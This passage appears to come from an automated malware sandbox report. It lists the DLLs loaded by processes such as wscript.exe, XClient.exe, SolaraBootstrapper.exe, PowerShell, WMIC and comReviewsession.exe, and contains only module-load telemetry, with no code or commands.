                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sxs.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: scrrun.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ntshrui.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: avicap32.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: msvfw32.dll
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: mscoree.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: apphelp.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: kernel.appcore.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: version.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Brokercrt\comReviewsession.exeSection loaded: uxtheme.dll
